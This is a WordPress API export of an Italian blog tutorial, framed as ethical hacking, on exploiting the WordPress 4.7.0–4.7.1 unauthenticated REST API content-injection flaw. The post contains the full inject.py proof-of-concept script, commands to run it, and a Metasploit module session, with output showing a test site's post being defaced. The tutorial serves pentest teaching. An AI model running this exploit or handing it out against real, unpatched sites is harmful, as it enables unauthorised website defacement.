 | [!] Title: WordPress 4.7.0-4.7.1 - Unauthenticated Page\/Post Content Modification via REST API\n |     Fixed in: 4.7.2\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8734\n |      - https:\/\/blog.sucuri.net\/2017\/02\/content-injection-vulnerability-wordpress-rest-api.html\n |      - https:\/\/blogs.akamai.com\/2017\/02\/wordpress-web-api-vulnerability.html\n |      - https:\/\/gist.github.com\/leonjza\/2244eb15510a0687ed93160c623762ab\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/e357195ce303017d517aff944644a7a1232926f7\n |      - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_content_injection\n<\/pre>\n<\/blockquote>\n<\/div>\n
WordPress 4.7.0-1 Content Injection Exploit – Inject.py<\/h3>\n
Per exploitare<\/b>” questa vulnerabilit\u00e0<\/b> scaricare inject.py dal link fornito da WPScan<\/b>: https:\/\/gist.github.com\/leonjza\/2244eb15510a0687ed93160c623762ab<\/a> o creare il file e copiare e inserire il codice.<\/p>\n
Creare un file di testo con Vi eseguendo il seguente comando.<\/p>\n
\n
\n
user@workstation:~> vi inject.py\n<\/pre>\n<\/blockquote>\n<\/div>\n
Copiare il codice sottostante e incollarlo per poi salvare e uscire.<\/p>\n
\n
\n
# 2017 - @leonjza\n#\n# WordPress 4.7.0\/4.7.1 Unauthenticated Content Injection PoC\n# Full bug description: https:\/\/blog.sucuri.net\/2017\/02\/content-injection-vulnerability-wordpress-rest-api.html\n\n# Usage example:\n#\n# List available posts:\n#\n# $ python inject.py http:\/\/localhost:8070\/\n# * Discovering API Endpoint\n# * API lives at: http:\/\/localhost:8070\/wp-json\/\n# * Getting available posts\n#  - Post ID: 1, Title: test, Url: http:\/\/localhost:8070\/archives\/1\n#\n# Update post with content from a file:\n#\n# $ cat content\n# foo\n#\n# $ python inject.py http:\/\/localhost:8070\/ 1 content\n# * Discovering API Endpoint\n# * API lives at: http:\/\/localhost:8070\/wp-json\/\n# * Updating post 1\n# * Post updated. Check it out at http:\/\/localhost:8070\/archives\/1\n# * Update complete!\n\nimport json\nimport sys\nimport urllib2\n\nfrom lxml import etree\n\n\ndef get_api_url(wordpress_url):\n    response = urllib2.urlopen(wordpress_url)\n\n    data = etree.HTML(response.read())\n    u = data.xpath('\/\/link[@rel=\"https:\/\/api.w.org\/\"]\/@href')[0]\n\n    # check if we have permalinks\n    if 'rest_route' in u:\n        print(' ! Warning, looks like permalinks are not enabled. This might not work!')\n\n    return u\n\n\ndef get_posts(api_base):\n    respone = urllib2.urlopen(api_base + 'wp\/v2\/posts')\n    posts = json.loads(respone.read())\n\n    for post in posts:\n        print(' - Post ID: {0}, Title: {1}, Url: {2}'\n              .format(post['id'], post['title']['rendered'], post['link']))\n\n\ndef update_post(api_base, post_id, post_content):\n    # more than just the content field can be updated. see the api docs here:\n    # https:\/\/developer.wordpress.org\/rest-api\/reference\/posts\/#update-a-post\n    data = json.dumps({\n        'content': post_content\n    })\n\n    url = api_base + 'wp\/v2\/posts\/{post_id}\/?id={post_id}abc'.format(post_id=post_id)\n    req = urllib2.Request(url, data, {'Content-Type': 'application\/json'})\n    response = urllib2.urlopen(req).read()\n\n    print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))\n\n\ndef print_usage():\n    print('Usage: {0}  (optional:  )'.format(__file__))\n\n\nif __name__ == '__main__':\n\n    # ensure we have at least a url\n    if len(sys.argv) < 2:\n        print_usage()\n        sys.exit(1)\n\n    # if we have a post id, we need content too\n    if 2 < len(sys.argv) < 4:\n        print('Please provide a file with post content with a post id')\n        print_usage()\n        sys.exit(1)\n\n    print('* Discovering API Endpoint')\n    api_url = get_api_url(sys.argv[1])\n    print('* API lives at: {0}'.format(api_url))\n\n    # if we only have a url, show the posts we have have\n    if len(sys.argv) < 3:\n        print('* Getting available posts')\n        get_posts(api_url)\n\n        sys.exit(0)\n\n    # if we get here, we have what we need to update a post!\n    print('* Updating post {0}'.format(sys.argv[2]))\n    with open(sys.argv[3], 'r') as content:\n        new_content = content.readlines()\n\n    update_post(api_url, sys.argv[2], ''.join(new_content))\n\nprint('* Update complete!')\n<\/pre>\n<\/blockquote>\n<\/div>\n
Una volta creato o scaricato il file eseguirlo come segue:<\/p>\n
\n
\n
user@workstation:~> python inject.py \nUsage: inject.py <url> (optional: <post_id> <file with post_content>)\nuser@workstation:~>\n<\/pre>\n<\/blockquote>\n<\/div>\n
Se si esegue inject.py senza argomenti il programma ci mostrer\u00e0 informazioni sul suo utilizzo.<\/p>\n
\n
\n
user@workstation:~> python inject.py http:\/\/chit-test.ch\n* Discovering API Endpoint\n* API lives at: http:\/\/chit-test.ch\/wp-json\/\n* Getting available posts\n - Post ID: 1, Title: Ciao mondo!, Url: http:\/\/chit-test.ch\/ciao-mondo\/\nuser@workstation:~>\n<\/pre>\n<\/blockquote>\n<\/div>\n
Se si esegue inject.py con solo la URL il programma ci mostra una lista di articoli presenti con ID, utile se non si dovesse essere a conoscenza dell’ID dell’articolo che si vuole modificare.<\/p>\n
Una volta a conoscenza dell’ID preparare il file di testo che contiene il testo che si vuole usare per la modifica dell’articolo.<\/p>\n
\n
\n
user@workstation:~> vi content\n<\/pre>\n<\/blockquote>\n<\/div>\n
Inserire il testo che si vuole usare nel file – in questo esempio: Sei stato hackerato, aggiorna WordPress! -, salvare ed uscire.<\/p>\n
Ora eseguire inject.py con l’ID dell’articolo e il file di testo appena creato.<\/p>\n
\n
\n
user@workstation:~> python inject.py http:\/\/chit-test.ch 1 content\n* Discovering API Endpoint\n* API lives at: http:\/\/chit-test.ch\/wp-json\/\n* Updating post 1\n* Post updated. Check it out at http:\/\/chit-test.ch\/ciao-mondo\/\n* Update complete!\nuser@workstation:~>\n<\/pre>\n<\/blockquote>\n<\/div>\n
WordPress REST API Content Injection Exploit con Metsploit<\/h3>\n
Per “exploitare” questa vulnerabilit\u00e0 usare il modulo: auxiliary\/scanner\/http\/wordpress_content_injection<\/b> di Metasploit<\/b>. Come prima cosa scoprire l’ID dell’articolo che si vuole modificare, per farlo impostare actions su LIST con il comando “set ACTION LIST<\/b>“. Per pi\u00f9 informazione dare un occhiata al link fornito da WPScan<\/b>:
\nWordPress Content Injection – rapid7.com<\/a><\/p>\n
\n
\n
msf > use auxiliary\/scanner\/http\/wordpress_content_injection\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > show actions\n\nAuxiliary actions:\n\nName    Description\n----    -----------\nLIST    List posts\nUPDATE  Update post\n\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > set ACTION LIST\nACTION => LIST\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > set RHOSTS chit-test.ch\nRHOSTS => chit-test.ch\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > show options\n\nModule options (auxiliary\/scanner\/http\/wordpress_content_injection):\n\nName           Current Setting  Required  Description\n----           ---------------  --------  -----------\nPOST_CONTENT                    no        Post content\nPOST_ID        0                no        Post ID (0 for all)\nPOST_PASSWORD                   no        Post password ('' for none)\nPOST_TITLE                      no        Post title\nProxies                         no        A proxy chain of format type:host:port[,type:host:port][...]\nRHOSTS         chit-test.ch     yes       The target address range or CIDR identifier\nRPORT          80               yes       The target port (TCP)\nSSL            false            no        Negotiate SSL\/TLS for outgoing connections\nTARGETURI      \/                yes       The base path to the wordpress application\nTHREADS        1                yes       The number of concurrent threads\nVHOST                           no        HTTP server virtual host\n\nAuxiliary action:\n\nName  Description\n----  -----------\nLIST  List posts\n\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > run\n\nPosts at http:\/\/10.10.10.4\/ (REST API: \/wp-json\/wp\/v2)\n======================================================\n\nID  Title                 URL                              Password\n--  -----                 ---                              --------\n1   Ciao mondo!  http:\/\/chit-test.ch\/ciao-mondo\/  No\n\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\nmsf auxiliary(scanner\/http\/wordpress_content_injection) >\n<\/pre>\n<\/blockquote>\n<\/div>\n
Una volta a conoscenza dell’ID dell’articolo che si vuole modificare impostare actions su UPDATE e inserire il resto delle informazioni come il contenuto dell’articolo, il titolo eccetera.<\/p>\n
\n
\n
msf auxiliary(scanner\/http\/wordpress_content_injection) > set ACTION UPDATE\nACTION => UPDATE\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > set POST_CONTENT \"Sei stato hackerato, aggiorna WordPress!\"\nPOST_CONTENT => Sei stato hackerato, aggiorna WordPress!\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > set POST_TITLE \"Sei stato hackerato!\"\nPOST_TITLE => Sei stato hackerato!\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > set POST_ID 1\nPOST_ID => 1\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > show options\n\nModule options (auxiliary\/scanner\/http\/wordpress_content_injection):\n\n   Name           Current Setting                           Required  Description\n   ----           ---------------                           --------  -----------\n   POST_CONTENT   Sei stato hackerato, aggiorna WordPress!  no        Post content\n   POST_ID        1                                         no        Post ID (0 for all)\n   POST_PASSWORD                                            no        Post password ('' for none)\n   POST_TITLE     Sei stato hackerato!                      no        Post title\n   Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]\n   RHOSTS         chit-test.ch                              yes       The target address range or CIDR identifier\n   RPORT          80                                        yes       The target port (TCP)\n   SSL            false                                     no        Negotiate SSL\/TLS for outgoing connections\n   TARGETURI      \/                                         yes       The base path to the wordpress application\n   THREADS        1                                         yes       The number of concurrent threads\n   VHOST                                                    no        HTTP server virtual host\n\n\nAuxiliary action:\n\n   Name    Description\n   ----    -----------\n   UPDATE  Update post\n\n\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > run\n\n[+] SUCCESS: http:\/\/10.10.10.4\/?p=1 (Post updated)\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > \n<\/pre>\n<\/blockquote>\n<\/div>\n
Una volta “exploitato” la vulnerabilit\u00e0<\/b> di WordPress 4.7.1<\/b> con successo dare un occhiata al sito preso di mira per vedere se ha veramente funzionato.<\/p>\n
\"WordPress<\/p>\n","protected":false},"excerpt":{"rendered":"
In questo esempio si andranno ad “exploitare” alcune vulnerabilit\u00e0 della versione 4.7.1 di WordPress. Per prima cosa scansionare il sito alla ricerca di vulnerabilit\u00e0 con WPScan. Rilevare vulnerabilit\u00e0 in WordPress con WPScan workstation:\/home\/chit # wpscan –url http:\/\/chit-test.ch WARNING: Nokogiri was built against LibXML version 2.9.9, but has dynamically loaded 2.9.7 _______________________________________________________________ __ _______ _____ \\…<\/p>\n
Read More “Hacking WordPress – Content Injection Exploit e DoS”<\/span> »<\/a><\/p>","protected":false},"author":5,"featured_media":1831,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[268,49,297,144],"tags":[291,121,259,21,10,113,290,12,76,283,16,110,2,292,258],"class_list":["post-1813","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ethical-hacking-penetration-testing","category-sicurezza-informatica-anonimato","category-tutorials","category-articoli-wordpress","tag-content-injection","tag-dos","tag-ethical-hacking","tag-exploit","tag-guida","tag-hacking","tag-hacking-etico","tag-italiano","tag-linux","tag-penetration-testing","tag-sicurezza","tag-vulnerabilita","tag-wordpress","tag-wordpress-4-7-1","tag-wpscan"],"yoast_head":"\nHacking WordPress - Content Injection Exploit e DoS • CHIT<\/title>\n<meta name=\"description\" content=\"Guida in italiano sul come hackerare un sito WordPress (WordPress 4.7.1) con un Content Injection Exploit.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/christeninformatica.ch\/it\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Hacking WordPress - Content Injection Exploit e DoS • CHIT\" \/>\n<meta property=\"og:description\" content=\"Guida in italiano sul come hackerare un sito WordPress (WordPress 4.7.1) con un Content Injection Exploit.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/christeninformatica.ch\/it\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/\" \/>\n<meta property=\"og:site_name\" content=\"CHIT\" \/>\n<meta property=\"article:published_time\" content=\"2019-05-27T13:30:06+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-05-09T04:42:52+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/christeninformatica.ch\/media\/wordpress-content-injection-exploit-metasploit-module-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"730\" \/>\n\t<meta property=\"og:image:height\" content=\"532\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chitblog\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"chitblog\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\\\/\"},\"author\":{\"name\":\"chitblog\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/#\\\/schema\\\/person\\\/b0952e900860b424a6b0906f1d6a0a64\"},\"headline\":\"Hacking WordPress – Content Injection Exploit e DoS\",\"datePublished\":\"2019-05-27T13:30:06+00:00\",\"dateModified\":\"2023-05-09T04:42:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\\\/\"},\"wordCount\":514,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/christeninformatica.ch\\\/media\\\/wordpress-content-injection-exploit-metasploit-module-1.jpg\",\"keywords\":[\"Content Injection\",\"DOS\",\"ethical hacking\",\"exploit\",\"guida\",\"hacking\",\"hacking etico\",\"italiano\",\"linux\",\"Penetration testing\",\"Sicurezza\",\"vulnerabilit\u00e0\",\"Wordpress\",\"WordPress 4.7.1\",\"wpscan\"],\"articleSection\":[\"Ethical Hacking \\\/ Penetration Testing\",\"Sicurezza \\\/ Anonimato\",\"Tutorials\",\"WordPress\"],\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/christeninformatica.ch\\\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\\\/\",\"url\":\"https:\\\/\\\/christeninformatica.ch\\\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\\\/\",\"name\":\"Hacking WordPress - Content Injection Exploit e DoS • CHIT\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/christeninformatica.ch\\\/media\\\/wordpress-content-injection-exploit-metasploit-module-1.jpg\",\"datePublished\":\"2019-05-27T13:30:06+00:00\",\"dateModified\":\"2023-05-09T04:42:52+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/#\\\/schema\\\/person\\\/b0952e900860b424a6b0906f1d6a0a64\"},\"description\":\"Guida in italiano sul come hackerare un sito WordPress (WordPress 4.7.1) con un Content Injection Exploit.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/christeninformatica.ch\\\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\\\/#primaryimage\",\"url\":\"https:\\\/\\\/christeninformatica.ch\\\/media\\\/wordpress-content-injection-exploit-metasploit-module-1.jpg\",\"contentUrl\":\"https:\\\/\\\/christeninformatica.ch\\\/media\\\/wordpress-content-injection-exploit-metasploit-module-1.jpg\",\"width\":730,\"height\":532},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/christeninformatica.ch\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Hacking WordPress – Content Injection Exploit e DoS\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/#website\",\"url\":\"https:\\\/\\\/christeninformatica.ch\\\/\",\"name\":\"CHIT\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/christeninformatica.ch\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/#\\\/schema\\\/person\\\/b0952e900860b424a6b0906f1d6a0a64\",\"name\":\"chitblog\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g\",\"caption\":\"chitblog\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Hacking WordPress - Content Injection Exploit e DoS • CHIT","description":"Guida in italiano sul come hackerare un sito WordPress (WordPress 4.7.1) con un Content Injection Exploit.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/christeninformatica.ch\/it\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/","og_locale":"it_IT","og_type":"article","og_title":"Hacking WordPress - Content Injection Exploit e DoS • CHIT","og_description":"Guida in italiano sul come hackerare un sito WordPress (WordPress 4.7.1) con un Content Injection Exploit.","og_url":"https:\/\/christeninformatica.ch\/it\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/","og_site_name":"CHIT","article_published_time":"2019-05-27T13:30:06+00:00","article_modified_time":"2023-05-09T04:42:52+00:00","og_image":[{"width":730,"height":532,"url":"https:\/\/christeninformatica.ch\/media\/wordpress-content-injection-exploit-metasploit-module-1.jpg","type":"image\/jpeg"}],"author":"chitblog","twitter_card":"summary_large_image","twitter_misc":{"Written by":"chitblog","Est. reading time":"15 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/christeninformatica.ch\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/#article","isPartOf":{"@id":"https:\/\/christeninformatica.ch\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/"},"author":{"name":"chitblog","@id":"https:\/\/christeninformatica.ch\/#\/schema\/person\/b0952e900860b424a6b0906f1d6a0a64"},"headline":"Hacking WordPress – Content Injection Exploit e DoS","datePublished":"2019-05-27T13:30:06+00:00","dateModified":"2023-05-09T04:42:52+00:00","mainEntityOfPage":{"@id":"https:\/\/christeninformatica.ch\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/"},"wordCount":514,"commentCount":0,"image":{"@id":"https:\/\/christeninformatica.ch\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/#primaryimage"},"thumbnailUrl":"https:\/\/christeninformatica.ch\/media\/wordpress-content-injection-exploit-metasploit-module-1.jpg","keywords":["Content Injection","DOS","ethical hacking","exploit","guida","hacking","hacking etico","italiano","linux","Penetration testing","Sicurezza","vulnerabilit\u00e0","Wordpress","WordPress 4.7.1","wpscan"],"articleSection":["Ethical Hacking \/ Penetration Testing","Sicurezza \/ Anonimato","Tutorials","WordPress"],"inLanguage":"it-IT","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/christeninformatica.ch\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/christeninformatica.ch\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/","url":"https:\/\/christeninformatica.ch\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/","name":"Hacking WordPress - Content Injection Exploit e DoS • CHIT","isPartOf":{"@id":"https:\/\/christeninformatica.ch\/#website"},"primaryImageOfPage":{"@id":"https:\/\/christeninformatica.ch\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/#primaryimage"},"image":{"@id":"https:\/\/christeninformatica.ch\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/#primaryimage"},"thumbnailUrl":"https:\/\/christeninformatica.ch\/media\/wordpress-content-injection-exploit-metasploit-module-1.jpg","datePublished":"2019-05-27T13:30:06+00:00","dateModified":"2023-05-09T04:42:52+00:00","author":{"@id":"https:\/\/christeninformatica.ch\/#\/schema\/person\/b0952e900860b424a6b0906f1d6a0a64"},"description":"Guida in italiano sul come hackerare un sito WordPress (WordPress 4.7.1) con un Content Injection Exploit.","breadcrumb":{"@id":"https:\/\/christeninformatica.ch\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/christeninformatica.ch\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/christeninformatica.ch\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/#primaryimage","url":"https:\/\/christeninformatica.ch\/media\/wordpress-content-injection-exploit-metasploit-module-1.jpg","contentUrl":"https:\/\/christeninformatica.ch\/media\/wordpress-content-injection-exploit-metasploit-module-1.jpg","width":730,"height":532},{"@type":"BreadcrumbList","@id":"https:\/\/christeninformatica.ch\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/christeninformatica.ch\/"},{"@type":"ListItem","position":2,"name":"Hacking WordPress – Content Injection Exploit e DoS"}]},{"@type":"WebSite","@id":"https:\/\/christeninformatica.ch\/#website","url":"https:\/\/christeninformatica.ch\/","name":"CHIT","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/christeninformatica.ch\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Person","@id":"https:\/\/christeninformatica.ch\/#\/schema\/person\/b0952e900860b424a6b0906f1d6a0a64","name":"chitblog","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g","caption":"chitblog"}}]}},"_links":{"self":[{"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/posts\/1813","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/comments?post=1813"}],"version-history":[{"count":0,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/posts\/1813\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/media\/1831"}],"wp:attachment":[{"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/media?parent=1813"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/categories?post=1813"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/tags?post=1813"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}